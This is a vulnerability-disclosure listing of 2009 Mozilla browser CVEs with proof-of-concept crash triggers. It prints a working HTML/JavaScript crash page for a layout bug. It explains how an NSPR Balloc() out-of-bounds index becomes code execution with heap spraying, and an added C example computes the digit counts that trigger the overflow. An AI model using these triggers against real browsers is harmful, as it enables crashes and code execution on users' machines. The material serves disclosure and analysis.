CVE reference:
CVE-2009-1563, CVE-2009-3370, CVE-2009-3371, CVE-2009-3372, CVE-2009-3373, CVE-2009-3374, CVE-2009-3375, CVE-2009-3376, CVE-2009-3377, CVE-2009-3378, CVE-2009-3379, CVE-2009-3380, CVE-2009-3381, CVE-2009-3382, CVE-2009-3383
Complete list of Proof-of-Concept codes (crash triggers)
1. (CVE-2009-3382) CSS Frame Constructor (layout/base/nsCSSFrameConstructor.cpp) in the browser engine does not properly handle first-letter frames
PoC:
<html><head><script>
function doe2(i) {
document.getElementById('a').setAttribute('style', 'display: -moz-box; ');
document.getElementById('c').style.display= 'none';
}
setTimeout(doe2,500,0);
</script>
<style>
div::first-letter {float: right; }
</style>
</head>
<body>
<div style="width: 50px; -moz-column-count: 2;">
a
<span style="display: table-cell;"></span><div style="display: -moz-box; font-size: 43px;">
<span id="a">
<span style="display: -moz-box;">
<span id="c">m</span>
</span>
</span>
</div>
</div>
</body>
</html>
2. (CVE-2009-1563) Array indexing error in NSPR's Balloc() leads to a heap-based buffer overflow during floating point conversion
Secunia Research Details:
The s2b() function takes the total number of digits and determines the first number K for which: 1 << K >= (numdigits + 8) / 9.
K is then passed to Balloc() to allocate memory. Balloc() indexes the static "freelist" array of 16 elements using K. If K is above 15, whatever pointer happens to follow the freelist array in memory is returned from Balloc().
#define Kmax 15
...
static Bigint *freelist[Kmax+1];
...
Balloc ..(k)..
{
    ...
    if (rv = freelist[k]) {      <-- out of bounds when k > Kmax
        freelist[k] = rv->next;
    }
    ...
    return rv;
}
For example, with K = 17 a pointer to a small heap buffer is returned from Balloc() and used to hold the converted big number. This results in a heap-based buffer overflow, followed by a call through a function pointer fetched from a corrupted virtual function table. Paired with heap spraying, this yields execution at an arbitrary address.
PoC #1:
https://bugzilla.mozilla.org/attachment.cgi?id=400490
PoC #2 (Secunia):
https://bugzilla.mozilla.org/attachment.cgi?id=400493
PoC #3:
https://bugzilla.mozilla.org/attachment.cgi?id=406726
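To make the index arithmetic above concrete, here is an added C example (not from this page and not Mozilla's dtoa code). It mirrors the K loop from s2b() as described, inverts it to compute the smallest digit count that pushes K past Kmax, and shows a bounds check on the freelist index. The Bigint struct, the function names and the guard are this example's own; in particular the guard is an assumption about how one would harden the lookup, not the upstream patch.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Same constant as in dtoa.c: freelist[] has Kmax + 1 == 16 slots. */
#define Kmax 15

/* Minimal stand-in for dtoa's Bigint (assumed layout, only what the freelist walk touches). */
typedef struct Bigint {
    struct Bigint *next;
    int k;
} Bigint;

static Bigint *freelist[Kmax + 1];

/* The loop from s2b(): smallest k such that (1 << k) >= (nd + 8) / 9,
 * where nd is the digit count handed to s2b(). */
int s2b_k_for_digits(size_t nd)
{
    size_t x = (nd + 8) / 9;
    int k = 0;
    while (((size_t)1 << k) < x)
        k++;
    return k;
}

/* Inverse of the above for k >= 1: the smallest nd that yields exactly k.
 * Needs (nd + 8) / 9 > (1 << (k - 1)), i.e. nd >= 9 * ((1 << (k - 1)) + 1) - 8. */
size_t min_digits_for_k(int k)
{
    if (k <= 0)
        return 0;
    return 9 * (((size_t)1 << (k - 1)) + 1) - 8;
}

/* Bounds predicate the vulnerable Balloc() lacked: k must address freelist[] itself. */
bool balloc_k_in_bounds(int k)
{
    return k >= 0 && k <= Kmax;
}

/* Hardened freelist lookup (example guard, not Mozilla's fix): refuses any k
 * outside freelist[] instead of reading the pointer stored after the array. */
bool balloc_take_from_freelist(int k, Bigint **out)
{
    *out = NULL;
    if (!balloc_k_in_bounds(k))
        return false;              /* vulnerable code indexed freelist[k] unconditionally here */
    if (freelist[k] != NULL) {
        *out = freelist[k];
        freelist[k] = (*out)->next;
    }
    return true;
}

/* Push one node onto freelist[3], take it back, and report whether the slot emptied. */
int freelist_roundtrip(void)
{
    Bigint node = { NULL, 3 };
    Bigint *got = NULL;
    freelist[3] = &node;
    if (!balloc_take_from_freelist(3, &got))
        return 0;
    return got == &node && freelist[3] == NULL;
}

int main(void)
{
    for (int k = 15; k <= 17; k++)
        printf("k = %d first reached with %zu digits (in bounds: %d)\n",
               k, min_digits_for_k(k), balloc_k_in_bounds(k));
    printf("freelist round trip ok: %d\n", freelist_roundtrip());
    return 0;
}
```

Running the block shows that a numeric string of 294913 digits is already enough for k = 16, the first index past the end of freelist[], and 589825 digits gives the k = 17 case the advisory text uses; both are trivially constructed from script.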
3. (CVE-2009-3375) Cross-origin data theft through document.getSelection()
PoC:
https://bug503226.bugzilla.mozilla.org/attachment.cgi?id=387576
Select a destination for the iframe and select 'go'. Make a text selection and the content should be displayed in an alert box.
4. (CVE-2009-3378) Crash while loading .ogg video
The oggplay_data_handle_theora_frame function (media/liboggplay/src/liboggplay/oggplay_data.c) in liboggplay attempts to reuse an earlier frame data structure upon encountering a decoding error for the first frame, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via a crafted .ogg video file.
PoC:
https://bugzilla.mozilla.org/show_bug.cgi?id=500311
Crash PoC (Video)
5. (CVE-2009-3371) Crash with recursive web-worker calls
Use-after-free vulnerability allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code by creating JavaScript web-workers recursively.
PoC:
https://bugzilla.mozilla.org/attachment.cgi?id=398496